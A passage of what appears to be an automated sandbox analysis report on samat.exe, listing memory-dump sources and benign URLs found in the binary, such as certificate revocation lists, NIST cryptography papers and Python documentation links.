samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC7EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4551934571.000001BCCA50A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: samat.exe, 00000008.00000002.4561597900.000001BCCCAEC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crlW
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crlO
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529696285.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: samat.exe, 00000008.00000003.4532754927.000001BCCC9FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB60000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://foo/bar.tar.gz
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://foo/bar.tgz
